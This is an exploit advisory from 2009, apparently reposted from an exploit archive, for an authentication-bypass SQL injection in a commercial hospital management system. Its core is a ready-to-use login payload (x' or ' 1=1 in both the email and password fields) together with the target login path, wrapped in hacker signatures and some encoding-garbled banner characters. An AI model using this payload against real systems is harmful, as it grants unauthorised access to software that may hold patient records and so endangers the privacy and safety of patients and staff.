id: 10282
date: 12/16/2009
title: Pre Hospital Management System (auth bypass) SQL Injection Vulnerab
author: R3d-D3v!L
cves: 

========================================================================
Pre Hospital Management System (auth bypass) SQL Injection Vulnerability
========================================================================

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: (4u7h 8yp455) Remote SQL Injection Vulnerability
[?]
[~] Vendor:www.preproject.com/hms.asp
[?]
[?] Software:PRE HOSTPITAL MANAGEMENT SYSTEM
[? ]Price $750.00
[?] author: ((R3d-D3v!L))
[?]
[?]Date: 16.dec.2009
[?]T!ME: 11:30 pm
[?]
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
 
 
[?] Exploit:
 
[?] E-/\/\A!L : x' or ' 1=1
 
[?] password : x' or ' 1=1
 
 
 
[?]demo:
 
[?]http://server/hms/login.php
 
 
N073:
 
REAL RED DEV!L W@S h3r3 LAMERZ
 
GAZA !N our hearts !



#  0day.today [2023-03-25]  #